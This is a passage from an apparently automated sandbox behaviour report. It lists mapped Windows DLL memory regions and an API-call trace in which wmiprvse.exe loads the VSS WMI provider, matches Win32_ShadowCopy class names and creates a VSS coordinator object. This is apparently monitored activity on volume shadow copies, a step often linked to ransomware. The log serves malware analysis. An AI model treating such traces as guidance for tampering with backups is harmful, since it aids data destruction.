end_va = 0x7fef9e96fff monitored = 1 entry_point = 0x7fef9e5e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1910 start_va = 0x7fefb0e0000 end_va = 0x7fefb0eefff monitored = 0 entry_point = 0x7fefb0e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1911 start_va = 0x7fefb330000 end_va = 0x7fefb33bfff monitored = 0 entry_point = 0x7fefb3315d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1912 start_va = 0x7fefb720000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb7215c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1913 start_va = 0x7fefb800000 end_va = 0x7fefb82cfff monitored = 0 entry_point = 0x7fefb801010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1914 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1915 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1916 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1917 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1918 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1919 start_va = 0x7fefcc70000 end_va = 0x7fefcc79fff monitored = 0 entry_point = 0x7fefcc73cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1920 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1921 start_va = 0x7fefce00000 end_va = 0x7fefce56fff monitored = 0 entry_point = 0x7fefce05e38 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1922 start_va = 0x7fefce60000 end_va = 0x7fefce8ffff monitored = 0 entry_point = 0x7fefce6194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1923 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1924 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1925 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1926 start_va = 0x7fefd610000 end_va = 0x7fefd61afff monitored = 0 entry_point = 0x7fefd611030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1927 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1928 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1929 start_va = 0x7fefd720000 end_va = 0x7fefd75cfff monitored = 0 entry_point = 0x7fefd7218f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1930 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1931 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1932 start_va = 0x7fefd830000 end_va = 0x7fefd86afff monitored = 0 entry_point = 0x7fefd831324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1933 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1934 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1935 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1936 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1937 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1938 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1939 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1940 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1941 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1942 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1943 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1944 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1945 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1946 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1947 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1948 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1949 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1950 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1951 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1952 start_va = 0x7feffae0000 end_va = 0x7feffb31fff monitored = 0 entry_point = 0x7feffae10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1953 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1954 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1955 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1956 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1957 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1958 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1959 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1960 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1961 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1962 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1963 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1964 start_va = 0x7fef4ac0000 end_va = 0x7fef4af2fff monitored = 1 entry_point = 0x7fef4ae2120 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\System32\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\system32\\wbem\\vsswmi.dll") Region: id = 1965 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1966 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1967 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1968 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1969 start_va = 0x270000 end_va = 0x276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1970 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1971 start_va = 0x270000 end_va = 0x276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1972 start_va = 0x260000 end_va = 0x261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1973 start_va = 0x7fef4b00000 end_va = 0x7fef4b13fff monitored = 0 entry_point = 0x7fef4b0c210 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 2682 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2683 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Thread: id = 82 os_tid = 0xc0c [0149.763] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0149.763] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0149.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x8) returned 0x41da30 [0149.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x14) returned 0x44f650 [0149.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x41da30 | out: hHeap=0x3e0000) returned 1 [0149.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x2c) returned 0x48abc0 [0149.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x44f650 | out: hHeap=0x3e0000) returned 1 [0149.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0xc8) returned 0x416760 [0149.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x416760 | out: hHeap=0x3e0000) returned 1 [0149.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x50) returned 0x45d810 [0149.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x45d810 | out: hHeap=0x3e0000) returned 1 [0149.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x9c) returned 0x452fa0 [0149.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x48abc0 | out: hHeap=0x3e0000) returned 1 [0149.776] memcpy (in: _Dst=0x108e4a8, _Src=0x46c8fc, _Size=0x4 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.777] memcpy (in: _Dst=0x108e4a8, _Src=0x46c209, _Size=0x4 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.777] memcpy (in: _Dst=0x108e4a8, _Src=0x46c904, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.777] memcpy (in: _Dst=0x108e4a8, _Src=0x46c20f, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.777] memcpy (in: _Dst=0x108e4a8, _Src=0x46c908, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.790] memcpy (in: _Dst=0x108e4a8, _Src=0x452fc9, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.790] memcpy (in: _Dst=0x108e4a8, _Src=0x452fcb, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.791] memcpy (in: _Dst=0x108e4a8, _Src=0x452fcd, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.791] memcpy (in: _Dst=0x108e4a8, _Src=0x452fcf, _Size=0x2 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.791] memcpy (in: _Dst=0x108e4a8, _Src=0x44f75e, _Size=0x4 | out: _Dst=0x108e4a8) returned 0x108e4a8 [0149.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108c560 | out: lpSystemTimeAsFileTime=0x108c560*(dwLowDateTime=0xab032de0, dwHighDateTime=0x1d9897a)) [0149.824] GetCurrentProcessId () returned 0xc1c [0149.824] GetCurrentThreadId () returned 0xc0c [0149.824] GetTickCount () returned 0x205a2dd [0149.824] QueryPerformanceCounter (in: lpPerformanceCount=0x108c568 | out: lpPerformanceCount=0x108c568*=3405197872631) returned 1 [0149.824] malloc (_Size=0x100) returned 0x515580 [0149.825] malloc (_Size=0x38) returned 0x519310 [0149.825] GetCurrentProcessId () returned 0xc1c [0149.825] QueryPerformanceCounter (in: lpPerformanceCount=0x108c248 | out: lpPerformanceCount=0x108c248*=3405197954920) returned 1 [0149.825] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\Setup", ulOptions=0x0, samDesired=0x20019, phkResult=0x108c200 | out: phkResult=0x108c200*=0x1ec) returned 0x0 [0149.825] RegQueryValueExW (in: hKey=0x1ec, lpValueName="SystemSetupInProgress", lpReserved=0x0, lpType=0x108c1a8, lpData=0x108c170, lpcbData=0x108c174*=0x4 | out: lpType=0x108c1a8*=0x4, lpData=0x108c170*=0x0, lpcbData=0x108c174*=0x4) returned 0x0 [0149.825] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\VSS\\Debug\\Tracing", ulOptions=0x0, samDesired=0x20019, phkResult=0x108c200 | out: phkResult=0x108c200*=0x0) returned 0x2 [0149.825] RegCloseKey (hKey=0x1ec) returned 0x0 [0149.825] time (in: timer=0x7fef4aed8e0 | out: timer=0x7fef4aed8e0) returned 0x646609d9 [0149.825] localtime (param_1=0x7fef4aed8e0) returned 0x514450 [0149.841] wcsftime (in: _Buf=0x108c260, _SizeInWords=0x80, _Format="%c", _Tm=0x514450 | out: _Buf="05/18/23 13:19:53") returned 0x11 [0149.841] __dllonexit () returned 0x7fef4ae7218 [0149.841] malloc (_Size=0x38) returned 0x519350 [0149.842] __dllonexit () returned 0x7fef4ae7204 [0149.842] __dllonexit () returned 0x7fef4ae722c [0149.843] malloc (_Size=0x18) returned 0x50f160 [0149.844] malloc (_Size=0x28) returned 0x514510 [0149.844] free (_Block=0x50f160) [0149.846] malloc (_Size=0x18) returned 0x50f160 [0149.846] malloc (_Size=0x18) returned 0x50f180 [0149.846] malloc (_Size=0x38) returned 0x519390 [0149.847] malloc (_Size=0x18) returned 0x50f1a0 [0149.847] malloc (_Size=0x18) returned 0x50f1c0 [0149.847] _wcsicmp (_String1="Win32_ShadowCopy", _String2="Win32_ShadowProvider") returned -13 [0149.847] malloc (_Size=0x38) returned 0x5193d0 [0149.847] malloc (_Size=0x18) returned 0x50f1e0 [0149.847] malloc (_Size=0x18) returned 0x50f200 [0149.847] _wcsicmp (_String1="Win32_ShadowFor", _String2="Win32_ShadowProvider") returned -10 [0149.847] _wcsicmp (_String1="Win32_ShadowFor", _String2="Win32_ShadowCopy") returned 3 [0149.847] _wcsicmp (_String1="Win32_ShadowCopy", _String2="Win32_ShadowFor") returned -3 [0149.847] malloc (_Size=0x38) returned 0x519410 [0149.847] malloc (_Size=0x18) returned 0x50f220 [0149.847] malloc (_Size=0x18) returned 0x50f240 [0149.847] _wcsicmp (_String1="Win32_ShadowBy", _String2="Win32_ShadowFor") returned -4 [0149.847] _wcsicmp (_String1="Win32_ShadowBy", _String2="Win32_ShadowCopy") returned -1 [0149.847] malloc (_Size=0x38) returned 0x519450 [0149.847] malloc (_Size=0x18) returned 0x50f260 [0149.847] malloc (_Size=0x18) returned 0x50f280 [0149.847] _wcsicmp (_String1="Win32_ShadowOn", _String2="Win32_ShadowFor") returned 9 [0149.847] _wcsicmp (_String1="Win32_ShadowOn", _String2="Win32_ShadowProvider") returned -1 [0149.847] _wcsicmp (_String1="Win32_ShadowFor", _String2="Win32_ShadowOn") returned -9 [0149.847] malloc (_Size=0x38) returned 0x519490 [0149.847] malloc (_Size=0x18) returned 0x50f2a0 [0149.848] malloc (_Size=0x18) returned 0x50f2c0 [0149.848] _wcsicmp (_String1="Win32_ShadowVolumeSupport", _String2="Win32_ShadowFor") returned 16 [0149.848] _wcsicmp (_String1="Win32_ShadowVolumeSupport", _String2="Win32_ShadowProvider") returned 6 [0149.848] _wcsicmp (_String1="Win32_ShadowProvider", _String2="Win32_ShadowVolumeSupport") returned -6 [0149.848] malloc (_Size=0x38) returned 0x5194d0 [0149.848] malloc (_Size=0x18) returned 0x50f2e0 [0149.848] malloc (_Size=0x18) returned 0x50f300 [0149.848] _wcsicmp (_String1="Win32_ShadowDiffVolumeSupport", _String2="Win32_ShadowFor") returned -2 [0149.848] _wcsicmp (_String1="Win32_ShadowDiffVolumeSupport", _String2="Win32_ShadowCopy") returned 1 [0149.848] _wcsicmp (_String1="Win32_ShadowCopy", _String2="Win32_ShadowDiffVolumeSupport") returned -1 [0149.848] malloc (_Size=0x38) returned 0x519510 [0149.848] malloc (_Size=0x18) returned 0x50f320 [0149.848] malloc (_Size=0x18) returned 0x50f340 [0149.848] _wcsicmp (_String1="Win32_ShadowStorage", _String2="Win32_ShadowFor") returned 13 [0149.848] _wcsicmp (_String1="Win32_ShadowStorage", _String2="Win32_ShadowProvider") returned 3 [0149.848] _wcsicmp (_String1="Win32_ShadowStorage", _String2="Win32_ShadowVolumeSupport") returned -3 [0149.848] _wcsicmp (_String1="Win32_ShadowProvider", _String2="Win32_ShadowStorage") returned -3 [0149.848] malloc (_Size=0x38) returned 0x519550 [0149.848] malloc (_Size=0x10) returned 0x51a250 [0149.848] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x3 [0149.849] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fef9e660b0, UserDataCount=0x5, UserData=0x108e420) returned 0x0 [0149.852] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () [0149.858] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0149.866] SetLastError (dwErrCode=0x0) [0149.866] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x108e6b8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x108e5c0 | out: pulNumLanguages=0x108e6b8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x108e5c0) returned 1 [0149.867] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x8) returned 0x41da90 [0149.867] SetLastError (dwErrCode=0x0) [0149.867] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x108e6b8, pwszLanguagesBuffer=0x41da90, pcchLanguagesBuffer=0x108e5c0 | out: pulNumLanguages=0x108e6b8, pwszLanguagesBuffer=0x41da90, pcchLanguagesBuffer=0x108e5c0) returned 1 [0149.867] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x8) returned 0x41da30 [0149.867] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x41da90 | out: hHeap=0x3e0000) returned 1 [0149.867] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20) returned 0x446fd0 [0149.867] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x446fd0, pulNumLanguages=0x108e6b8 | out: pulNumLanguages=0x108e6b8) returned 1 [0149.867] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x446fd0 | out: hHeap=0x3e0000) returned 1 [0149.868] CoImpersonateClient () returned 0x0 [0149.869] malloc (_Size=0x18) returned 0x51a270 [0149.869] _wcsicmp (_String1="Win32_ShadowFor", _String2="Win32_ShadowCopy") returned 3 [0149.869] _wcsicmp (_String1="Win32_ShadowCopy", _String2="Win32_ShadowCopy") returned 0 [0149.869] _wcsicmp (_String1="Win32_ShadowBy", _String2="Win32_ShadowCopy") returned -1 [0149.869] _wcsicmp (_String1="Win32_ShadowCopy", _String2="Win32_ShadowCopy") returned 0 [0149.869] free (_Block=0x51a270) [0149.869] malloc (_Size=0x28) returned 0x5144e0 [0149.869] malloc (_Size=0x18) returned 0x51a270 [0149.872] CoImpersonateClient () returned 0x0 [0149.872] CoCreateInstance (in: rclsid=0x7fef4ac6038*(Data1=0xe579ab5f, Data2=0x1cc4, Data3=0x44b4, Data4=([0]=0xbe, [1]=0xd9, [2]=0xde, [3]=0x9, [4]=0x91, [5]=0xff, [6]=0x6, [7]=0x23)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7fef4ac6048*(Data1=0xda9f41d4, Data2=0x1a5d, Data3=0x41d0, Data4=([0]=0xa6, [1]=0x14, [2]=0x6d, [3]=0xfd, [4]=0x78, [5]=0xdf, [6]=0x5d, [7]=0x5)), ppv=0x514500 | out: ppv=0x514500*=0x4805e8) returned 0x0 [0149.883] ObjectStublessClient3 () [0149.885] ObjectStublessClient10 () [0149.890] ObjectStublessClient3 () [0149.891] VSSCoordinator:IUnknown:Release (This=0x480738) returned 0x0 [0149.893] VSSCoordinator:IUnknown:Release (This=0x4805e8) returned 0x0 [0149.893] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0149.893] free (_Block=0x51a270) [0149.893] free (_Block=0x5144e0) [0149.894] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x4) returned 0x41dad0 [0149.894] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x41dad0, pulNumLanguages=0x108e6b0 | out: pulNumLanguages=0x108e6b0) returned 1 [0149.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x41dad0 | out: hHeap=0x3e0000) returned 1 [0179.990] ?Release@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x1 [0179.990] free (_Block=0x51a250) [0179.990] free (_Block=0x514510) Thread: id = 83 os_tid = 0xc3c Thread: id = 84 os_tid = 0xc38 [0179.994] DllCanUnloadNow () returned 0x0 [0179.995] DllCanUnloadNow () returned 0x1 Thread: id = 85 os_tid = 0xc34 Thread: id = 86 os_tid = 0xc30 Thread: id = 87 os_tid = 0xc28 Thread: id = 88 os_tid = 0xc24 Thread: id = 89 os_tid = 0xc20 Thread: id = 113 os_tid = 0xd7c Thread: id = 157 os_tid = 0xa90 Process: id = "10" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5bf63000" os_pid = "0x544" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "8" 